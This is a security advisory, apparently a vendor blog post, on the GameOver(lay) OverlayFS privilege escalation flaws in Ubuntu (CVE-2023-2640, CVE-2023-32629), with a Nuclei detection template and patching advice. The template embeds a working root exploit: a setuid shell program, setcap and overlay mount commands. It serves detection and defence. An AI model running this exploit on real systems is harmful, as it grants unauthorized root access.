3 min read
GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
Table of Contents
Authors
GameOver(lay) encompasses two significant vulnerabilities within the Ubuntu kernel, CVE-2023-2640, and CVE-2023-32629, each carrying a high-severity rating with CVSS scores of 7.8. These vulnerabilities pose a critical threat, potentially affecting around 40% of Ubuntu users. The vulnerability lies within the OverlayFS module of the Ubuntu kernel, enabling a local attacker to execute a privilege escalation attack, granting unauthorized elevated access to the system.
Technical Details
CVE-2023-2640: This vulnerability emerges from specific configurations within Ubuntu kernels. It occurs when an Ubuntu kernel includes both c914c0e27eb0
and the UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs
modifications. An unprivileged user gains the ability to set privileged extended attributes on files mounted via OverlayFS. These attributes are then improperly applied to the upper files, bypassing the necessary security checks. This creates a loophole where unprivileged users can perform actions they typically wouldn't have permission to perform.
CVE-2023-32629: This is a local privilege escalation vulnerability present in Ubuntu's OverlayFS. The flaw resides in the ovl_copy_up_meta_inode_data
function of OverlayFS, which incorrectly skips permission checks when executing ovl_do_setxattr
. The crux of this vulnerability is the potential for an attacker to craft a special executable file endowed with scoped file capabilities. When the Ubuntu Kernel is tricked into copying this file to a location with un-scoped capabilities, it inadvertently grants root-like privileges to any user who executes the file. This vulnerability allows a local attacker to escalate their privileges to the highest level, gaining unfettered access to the system.
Nuclei Template
cli
1id: CVE-2023-2640
2
3info:
4 name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
5 author: princechaddha
6 severity: high
7 description: |
8 A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
9 tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local
10
11self-contained: true
12code:
13 - engine:
14 - sh
15 - bash
16 source: |
17 id
18
19 - engine:
20 - sh
21 - bash
22 source: |
23 cd /tmp
24 echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
25 gcc test.c -o test
26 unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"
27
28 matchers:
29 - type: dsl
30 dsl:
31 - '!contains(code_1_response, "(root)")'
32 - 'contains(code_2_response, "(root)")'
33 condition: and
Timeline
The vulnerabilities were fixed by Ubuntu as of July 24, 2023, following responsible disclosure.
Remediation
Users are recommended to apply updates provided by Ubuntu to mitigate these vulnerabilities. Taking advantage of these vulnerabilities requires establishing a user namespace and an OverlayFS mount, hinting that attackers need local code execution capabilities on the targeted system, making remote exploitation unlikely.